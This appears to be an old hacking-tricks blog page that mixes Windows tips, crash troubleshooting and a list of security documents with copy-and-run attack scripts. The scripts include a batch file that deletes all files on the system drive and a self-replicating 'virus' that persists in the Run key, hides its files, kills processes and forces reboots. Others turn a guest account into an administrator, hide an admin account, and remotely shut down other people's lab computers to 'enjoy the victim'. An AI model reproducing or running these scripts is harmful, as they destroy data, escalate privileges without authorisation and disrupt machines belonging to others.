See Thru...

Please Look Once

Publish Your Ads...

Wednesday, July 22, 2009

EDIT PHOTO AND PAGE ANY WEBSITE BY JAVA SCRIPT......

1}JUST OPEN ANY SITE YOU WANT TO EDIT.

2}THE COPY ABOVE JAVASCRIPT CODE AND PASTE IN YOU URL.

javascript:document.body.contentEditable='true'; document.designMode='on'; void

3}THEN ENTER

4}YOUR READY TO EDIT THE PAGE.......

MULTIPLE LOGIN IN YAHOO MESSENGER......

1} GO TO->RUN

2}THEN TYPE REGEDIT AND ENTER.

3}NAVIGATE TO HEKY_CURRENT_USER->SOFTWARE->YAHOO->PAGER->TEST

4}ON THE RIGHT PAGE,RIGHT-CLICK AND CHOOSE NEW DWORD VLUE.

5}RENAME IT AS PLURAL.

6}DOUBLE CLICK AND ASSIGN A DECIMAL VALUE OF 1.

7}NOW CLOSE THE REGISTRY AND RESTART YAHOO MESSENGER .DONE....

Tuesday, July 21, 2009

FUNNY JAVA SCRIPT..............

Copy and paste the java script code to the address bar of your browser

javascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(1000)

2: Press enter and watch your window's "shaking it". You can change the value of i if you wish

FORMAT YOUR HARDISK...THIS IS VIRUS...

Do not try it on ur PC. This is educational purpose only
1}go to notepad and copy below code
@Echo off
Del C:\ *.*y
save it Dell.bat
worse
@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00
and save it as a .bat file

SIMPLE MAKING VIRUS.....................

Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)Be carefull & Don't run this on ur pc
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v
Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

RESTRICT USER LOGIN HOURS WITHOUT SOFTWARE......

1}first start the command prompt.
2}then type below command
Below are some examples:
1 - net user Joanna /time:M-F,08:00-17:00
2 - net user Ninja /time:M-F,8am-5pm
3 - net user Echelon /time:M,4am-5pm;T,1pm-3pm;W-F,8:00-17:00
4 - net user Shine /time:all (this one means this user can always log on)

Note:You can only restrict when a user can log on to the system.

HOW TO GET ADMIN ACCOUNT FROM GUEST ACCOUNT?

HaCk "GUEST" with Admin privileges........
echo offtitle
Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"then u can double click the file to execute or run in the cmd.it works...

HOW TO HIDE YOUR HARD DISK WITHOUT ANY SOFTWARE?

1}first open command prompt and type DISKPART then ENTER.
2}then write LIST VOLUME
3}then write select volume 1 or 2 or or 3 etc
4}then write remove letter

HOW TO HIDE USER ACCOUNT AS HIDDEN ADMINISTRATOR ACCOUNT?

Start the Registry Editor
Go to:
1}HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
2}Right-click an empty space in the right pane and select New > DWORD Value Name the new value IT YOUR ACCOUNT NAME FOR HIDE.3} Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Shutting down network computer without anysoftwares

SHUT DOWN NETWORK COMPUTERS(if u use computers from ur coll or school lab or internet cafe)simply type "shutdown -i" without quotes in start-run and enter.enter the ip address or name of the computer which you want to shut down. leave a funny message and enjoy the victim.

HOW TO LOCK THE FOLDER WITHOUT ANY SOFTWARE?

Lock any folder using DOSFriends Hide your folders with out using any softjust go to1}run.....>cmd....>note 1 "_" give 1 space on that placenote2} if your folder is at D drive then-->first you D: and press ENTER3} after you write below command-->Attrib "your folder name"_+r_+a_+s_+h-->ENTER4}if you want to view that folder thenyou write same command use with -like -->attrib "your folder name"_–r_–a_–s_–h

HOW TO RESTRIC WEBSITE ON YOUR PC?

1) Go to this directory [c:\windows\system32\drivers\etc]
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with NOTE PADE
5) In the last link of the document type the IP* address of 127.0.0.1 www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser.

AMAZING HACKING TOOLS AND BOOKS LIST FOR DOWNLOAD.

Hackers Manifest
The hackers manifest by the Mentor. Every hacker should know this
1,755 bytes
Diary of a hacker
Duh...
13,226 bytes
Hacker Ethics
What is A hacker ?
2,777 bytes
Are you a hacker ?
See if you fit this description...
784 bytes
How I knew when I was a hacker
Another file on being a hacker
2,585 bytes
A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers
A joke, not to be taken seriously (unless you want to go to jail, of course...)
4,035 bytes
Concerning Hackers Who Break into Computer Systems
File on hackers by a sysop who's sympathetic to hackers
22,914 bytes
Hacker Crackdown
Good book that describes the hacker crackdown of
1991275,654 bytes
Ethics Of A True Hacker
Recent file written by The Mob Boss about hacking ethics. Nice
2,952 bytes
The Mob Boss's Guide To Hacking
Guide for beginner hackers on how to start by The Mob Boss. Read this if you're just starting
12,224 bytes
Psychological Profile Of The Troubled Female Teen
Funny file on how to hack girls. Read it for a laugh
5,143 bytes
How To Be A Hacker
File that explains the hacker mentality. Nice one
11,834 bytes
Humor
Teaches you how to be
3133715,613 bytes

:UNIX:
NameDescriptionSize

Hackers Kit
Explains UNIX security all round and shows a few basic old bugs. Also has a root kit. This was the file that taught me the basics of hacking UNIX
295,129 bytes
Unix Computer Security Checklist
Security holes to look out for when hacking a system
26,429 bytes
Improving the Security of Your Site by Breaking Into it
Nice (old) paper on common holes
20,827 bytes
Unix : A Hacking Tutorial
Well written file on the basics of unix
37,944 bytes
Millenium Hacking
A file written to show people what hacking was like at the end of the 20th century. Basic, but good for beginners
368,329 bytes
Unix for Intermediate Users
Not so much a hacking file, just explains the basics of unix.
71,758 bytes
Crash Course In X Windows Security
Explains the basics of X Windows security
5,449 bytes
Playing with the Internet Daemons
Old file explaining bugs in daemons, good for beginner hackers to get an idea about what security holes are
6,467 bytes
Secure UNIX programming FAQ
Explains the basics on how to code safely in UNIX
21,211 bytes
NFS Tracing By Passive Network Monitoring
Good read if you're interested in NFS
12,368 bytes
Linux Administrators Security Guide
THE linux security resource (PDF)
273,688 bytes
Securing and Optimising Red Hat Linux
I cannot praise this enough. 475 pages of how to secure your redhat box properly. READ IT!!! (PDF)
2,468,188 bytes
Kernel hacking made easy
Short tutorial that provides a nice introduction to kernel system calls
3,796 bytes
Coding with the DNS protocol
Short tutorial on coding with DNS8,
740 bytes
Linux Firewalling - Insights and Explainations...
Read this and learn a bit about firewalls
5,358 bytes
A Lab engineers check list for writing secure Unix code
Paper that explains a few things you can do to code more secure programs in Unix
8,106 bytes

:SOCKETS :
NameDescriptionSize
BSD Sockets: A Quick And Dirty Primer
This is a short tutorial that explains what sockets are, how they work, and gives sample code showing how to use them.
486,960 bytes
A brief programming tutorial in C for raw sockets
Teaches the basics of using raw sockets in C, to insert any IP protocol based datagram into the network traffic.
7,309 bytes

:CRACKING :
NameDescriptionSize
How To Crack
Good file that teaches the basics of cracking
122,376 bytes
The Ancient Art Of Cracking
Another excellent file on cracking
68,917 bytes

:BUFFER OVERFLOWS :
NameDescriptionSize
How to write buffer overflows
File that explains how to write buffer overflows
7,195 bytes
Smashing The Stack For Fun And Profit
Excellent file that explains buffer overflows
15,191 bytes
Exploiting Windows NT 4 Buffer Overruns
By far the best file I've found that explains buffer overflows in NT
12,629 bytes
Writing buffer overflow exploits - a tutorial for beginners
Short and sweet tutorial
8,916 bytes
Libsafe : Protecting Critical Elements of Stacks
Nice whitepaper that explains buffer overflows and what libsafe does (PDF)
177,423 bytes
Buffer Overrun Attacks
Explains what buffer overflows are. Good for beginners (PDF)
387,028 bytes
Advanced buffer overflow exploit
Shows all the cool sutff you can do once you've found a buffer overflow
9,169 bytes
Compromised - Buffer Overflows, from Intel to SPARC Version 8
Talks about what buffer overflows are, why they work and how to approach them. Again, a good file for beginners
19,141 bytes
w00w00 on Heap Overflows
Nice and sweet tutorial on heap-based buffer overflows
13,408 bytes

:NOVELL NETWARE:
NameDescriptionSize
The unofficial netware Hack FAQ
Everything you wanted to know about netware
41,634 bytes

:DENIAL OF SERVICE:
NameDescriptionSize
Introduction to denial of service
Intro on denial of service attacks
17,459 bytes
Protecting Routing Infrastructures from Denial Of Service Using Cooperative Intrusion Detection
Whitepaper that explains a method to combat DoS attacks. Interesting read (PDF)
118,400 bytes

:CGI:
NameDescriptionSize
Safe CGI Programming
Nice little paper that explains the basics for writing safe CGI code
6,456 bytes

:CODING:
NameDescriptionSize

C Programming
Nice and sweet C tutorial
200,316 bytes

:MISCELLANEOUS :
NameDescriptionSize
Modern Hackers Deskreference
Reference file with things that every hacker should know. Contians info on WindowsNT security issues, Unix, Linux, Irix, Vax, Router configuration, Frontpage, Wingate and much much more. READ IT
182,301 bytes
Common Insecurities Fail Scrutiny
Explains Netbios & Samba bugs and how to exploit them
46,313 bytes
Techniques Adopted By 'System Crackers' When Attempting To Break Into Corporate or Sensitive Private Networks
Explains the basics on how to hack a system from a system administrators point of view (VERY basic)
12,027 bytes
The unofficial Web Hack FAQ
Nice things to do with the web
54,000 bytes
Simple Active Attack Against TCP
This paper describes an active attack against the Transport Control Protocol (TCP) which allows a cracker to redirect the TCP stream through his machine thereby permitting him to bypass the protection offered by such a system as a one-time password [skey] or ticketing authentication [kerberos]
14,302 bytes
Introduction to the Internet Protocols
This is an introduction to the Internet networking protocols (TCP/IP). It includes a summary of the facilities available and brief descriptions of the major protocols in the family
30,737 bytes
The Hackers Handbook
May be old, by an excellent read nontheless. Read it to understand the basics and a bit of hacker history
127,015 bytes

:PORTSCANNING:
NameDescriptionSize
Practical Automated Detection Of Stealthy Portscans (PDF)
Explains how to detect portscans. Although meant for people trying to protect their systems it explains some of the techniques portscanners use to remain undetected.
151,603 bytes
ICMP Usage In Scanning (PDF)
Paper that describes what information can be gained from a target network using ICMP. Well written and DEFINATELY worth a read if you're a beginner.
434,372 bytes

:WINDOWS NT :
NameDescriptionSize
The unofficial NT Hack FAQ
Basics on NT security
44,622 bytes
Wardoc
This document is an attempt by the Rhino9 team to document the methodology and techniques used in an attack on A NT based network. The intent of this document is to educate administrators and security professionals of both the mindset of an attacker and A large set of the current NT penetration techniques. This document attempts to follow in the footsteps of the classic text, "How To Improve The Security Of Your Site by Breaking Into It" by Dan Farmer and Wietse Venema. Obviously, this text will not contain all known methods for NT network
PENITRATION
28,388 bytes
Understanding Microsoft Proxy Server 2.0
This documented was not made for people who have been working with Microsoft Proxy Server since its beta (catapult) days. It is made for individuals who are curious about the product and security professionals that are curious as to what Microsoft Proxy Server has to offer. This document is also being written for individuals have a general idea of what a Proxy Server does, but wants to know more. This paper goes into discussion of Proxy Server Features and Architecture, Access Control, Encryption, and Firewall Strategies (which I have been getting a lot of requests for)
10,971 bytes
Analysis of the Security of Windows NT
Interesting paper about Windows NT security (PDF)
417,510 bytes
A *REAL* NT Rootkit, patching the NT Kernel
Nice tutorial that explains how to patch NT to do what you want it to do17,304 bytes

:VAX :
NameDescriptionSize
Vax Hacking FAQ
The only file that I could find that deals singularly with VAXEN. So it'll have to do. Never used A VAX before, so I can't vouch for this file
21,823 bytes
A Practical Exercise in Securing an OpenVMS System
This paper deals with securing VMS. As I've never uses OpenVMS I can't vouch for this one either
32,650 bytes

:RAINBOW BOOKS:
ColourDescriptionSize
Aqua
Glossary of Computer Security Acronyms
21,415 bytes
Blue
Trusted Product Evaluation Questionnaire
18,197 bytes
Brown
Guide to Understanding Trusted Facility Management
29,060 bytes
Burgendy
A Guide To Understanding Design Documentation
20,543 bytes
Dark Lavender
A Guide To Understanding Trusted Distribution in Trusted Systems
17,502 bytes
Green
DoD Password Management Guideline
18,690 bytes
Grey
TRUSIX Rationale for Selecting Access Control List Features For The Unix System
38,835 bytes
LightBlue
A Guide To Understanding I & A18,
101 bytes
Orange
DoD Trusted Computer System Evaluation Criteria
63,911 bytes
Another Orange
A Guide To Understanding Configuration Management in Trusted Systems
42,462 bytes
Peach
A Guide To Writing the Security Features User's Guide for Trusted Systems
16,576 bytes
Pink
Rating Maintenance Phase Program
26,257 bytes
Purple
Guidelines for Formal Verification Systems
17,667 bytes
Red
Trusted Network Interpretation
246,679 bytes
Another Red
Trusted Network Interpretation Environments Guideline
37,272 bytes
Venice Blue
Computer Security Subsystems
18,251 bytes
Yellow
Guide For Applying the DoD Trusted Computer SysteM

Thursday, June 18, 2009

Why systems Crash???

Fatal error: the system has become unstable or is busy,” it says. “Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications.”

You have just been struck by the Blue Screen of Death. Anyone who uses Microsoft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

We at InternetGeeks.Org List out some of important reasons:

1. Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow ‘!’ appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as ‘IRQ holder for PCI steering’. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

2. Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

3. BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer’s display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to ‘yes’ to allow Windows to do this.).

4. Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

5. Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card’s manufacturer on the internet and search for the most recent drivers for it.

6. Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

7. Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer’s performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer’s default settings and you may be able to carry on.

8. Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don’t do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org

Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message “Starting Windows” press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn’t work.

Remember to restore all the BIOS settings back to their former settings following installation.

9. Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

10. Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

System Security

Before you spend a dime on security, there are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.

3. Install a free spyware blocker. Our Editors’ Choice (”Spyware,” April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you’ll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

6. If you’re using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.

7. Buy antivirus software and keep it up to date. If you’re not willing to pay, try Grisoft AVG Free Edition (Grisoft Inc., w*w.grisoft.com). And doublecheck your AV with the free, online-only scanners available at w*w.pandasoftware.com/activescan and _http://housecall.trendmicro.com.

8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get. For more, check out our wireless section or see the expanded coverage in Your Unwired World in our next issue.

9. Join a respectable e-mail security list, such as the one found at our own Security Supersite at _http://security.ziffdavis.com, so that you learn about emerging threats quickly and can take proper precautions.

10. Be skeptical of things on the Internet. Don’t assume that e-mail “From:” a particular person is actually from that person until you have further reason to believe it’s that person. Don’t assume that an attachment is what it says it is. Don’t give out your password to anyone, even if that person claims to be from “support.”

Some tips n tricks for Windows XP

Running Applications in Compatibility Mode

With Windows XP, you can run programs as if though they were being run under a different operating system. (This is known as “emulation”.) Simply right-click a shortcut, select “Properties” and then check “Run in compatibility mode” and select the operating system you wish to make the program believe it is being run under. This fools or tricks the program into thinking you are really using a previous version of Windows, such as NT, 2000, 98, or 95. This is especially useful for certain games that won’t run properly. Be careful *not* to use this with certain system utilities, such as antivirus, defrag, registry, and disk tool applications.

Customizing the Start Menu

Right click on the “Start” button and left click “Properties”. From here, you can select the new Windows XP style Start Menu, or return to the Windows 2000/Millennium style one. You can also customize the two possible choices using their corresponding “Customize” buttons. This also allows you to turn on or disable cascading menus and other options that are useful, such as large or small icons and more.

Bring Back Those Desktop Icons

After you install Windows XP, you probably noticed that some of your icons from previous versions of Windows you’ve used are missing. Microsoft did this intentionally to help simply and reduce clutter. Of course, for some people, this isn’t the best choice or the user preference. So, if you want those icons like “My Computer” and “My Network Places” back, just open Display Properties (right click Desktop Wallpaper, left click “Properties”) and click the “Desktop” tab. Click the “Customize Desktop” button and on the “General” tab check the items you want. You can also change the icons used by these desktop items in the same screen. One final tip related to this screen is the “Clean Desktop Now” button, which notifies you of unused icons on the desktop and offers to remove them if you choose.

Give Me My ClearType

Windows XP includes a great new visual technology, called “ClearType” which increases horizontal legibility by approximately 00% and it looks great. Go back into “Display Properties” [see tip: "Bring Back Those Desktop Icons" for instructions] and this time, go to he “Appearance” tab. Click “Effects” and for the second drop down box, labeled “Use the following method to smooth edges of screen fonts”, select “ClearType”. Click OK twice and you’re all set.

Lock Computer vs. Welcome Login Screen

You must go into Control Panel and open the “User Accounts” applet to change this setting. Click “Change the way users log on or off”. For maximum security, uncheck the “Use the Welcome screen” option. This re-enables the use of the “Lock Computer” option from the ALT CTRL DELETE menu, but prevents multiple users from being logged on locally at a single time. This also returns to the Windows 2000 style login screen. If you’d rather have the ability to *not* be able to use “Lock Computer” and would rather allow multiple users to logon to the computer at a single time locally, leave this setting checked and also check “Use Fast User Switching”.

Looking for a Windows XP Compatible Driver?

If you can’t find a driver for a hardware device under Windows XP, you can try to use a Windows 2000 compatible driver for the same hardware. Usually this tends to work, and in my experience so far, it always has. However, if you can find a driver specifically designed for use with Windows XP, that is usually the best and safest option. You can also e-mail the hardware manufacturer and ask them about Windows XP compatibility and drivers.

Make Money...

More Info